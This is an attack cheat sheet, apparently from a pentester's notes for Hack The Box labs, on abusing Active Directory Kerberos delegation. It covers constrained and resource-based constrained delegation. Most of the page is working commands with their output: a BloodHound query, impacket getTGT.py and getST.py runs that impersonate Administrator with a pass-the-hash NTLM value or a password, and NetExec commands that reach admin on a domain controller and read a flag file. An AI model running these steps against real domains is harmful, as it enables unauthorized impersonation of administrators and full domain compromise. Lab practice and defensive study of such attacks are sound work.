#############
AD Delegation
#############

*****************
AllowedToDelegate
*****************

| Constrained Delegation Privileges
| AllowedToDelegate (msds-allowedtodelegateto)

| You can list constrained delegation with bloodhound.

.. code-block:: 

    MATCH p=()-[r:AllowedToDelegate]->() RETURN p

|

| Open the source node and check the "Allowed To Delegate" SPN value
| Then you can impersonate any user on that SPN, in our example the SPN is "www/dc.domain.htb"

.. code-block:: bash

    cd /tmp/
    unset KRB5CCNAME
    rm *.ccache
    getST.py -spn 'www/dc.domain.htb' -impersonate 'Administrator' -hashes ':4c395675187a74271de7c4af867ad417' 'domain.htb/compromised' -dc-ip 10.129.95.154
    [...]
    [-] CCache file is not found. Skipping...
    [*] Getting TGT for user
    [*] Impersonating Administrator
    [*] Requesting S4U2self
    [*] Requesting S4U2Proxy
    [*] Saving ticket in Administrator@www_dc.domain.htb@DOMAIN.HTB.ccache
    [...]

|

| If you encounter time issue, you can sync with DC ntp

.. code-block:: bash

    sudo rdate -n dc.domain.htb

|

| Sometimes you can change the initial SPN to the one you want without problem
| Using SMB will need the CIFS spn, and WINRM need WSMAN or HTTP.

.. code-block:: bash

    mv *.ccache adminwww.ccache
    export KRB5CCNAME="$(pwd)/adminwww.ccache"
    klist "$KRB5CCNAME"

    nxc smb dc.domain.htb --use-kcache
    SMB         10.129.95.154   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:domain.htb) (signing:True) (SMBv1:False)
    SMB         10.129.95.154   445    DC               [+] domain.htb\Administrator from ccache (Pwn3d!)

|

************
AllowedToAct
************

| https://support.bloodhoundenterprise.io/hc/en-us/articles/17322164218267-AllowedToAct
| This edge allows an attacker to abuse resource-based constrained delegation to compromise the target
|
| AllowedToAct (msds-AllowedToActOnBehalfOfOtherIdentity)

| Let's say we have control over a group "DELEGATEDADMINS" that have AllowedToAct on DC01.BOX.HTB
| We also have a compromised account "COMPROMISEDACCOUNT" (probably can be a computer but didn't tried)
| We make sure "COMPROMISEDACCOUNT" have a SPN set (anything will do).
| We add "COMPROMISEDACCOUNT" to "DELEGATEDADMINS" group
|
| We auth with "COMPROMISEDACCOUNT" to retrieve a ticket

.. code-block:: bash

    getTGT.py 'BOX.HTB'/'COMPROMISEDACCOUNT':'Pototo_123' -dc-ip 'DC01.BOX.HTB'
    export KRB5CCNAME=COMPROMISEDACCOUNT.ccache

| Now we impersonate "USER_ADMIN" 
| Please note that impersonated user can't be in the "Protected Users" security group.

.. code-block:: bash

    getST.py -spn 'CIFS/DC01.BOX.HTB' -impersonate 'USER_ADMIN' 'BOX.HTB'/'COMPROMISEDACCOUNT' -no-pass
    [*] Impersonating USER_ADMIN
    [*] Requesting S4U2self
    [*] Requesting S4U2Proxy
    [*] Saving ticket in USER_ADMIN@CIFS_DC01.BOX.HTB@BOX.HTB.ccache

.. code-block:: bash

    mv USER_ADMIN\@CIFS_DC01.BOX.HTB\@BOX.HTB.ccache USER_ADMIN.ccache
    export KRB5CCNAME=USER_ADMIN.ccache
    nxc smb DC01.BOX.HTB -k --use-kcache -X 'cat /users/Administrator/Desktop/root.txt'

|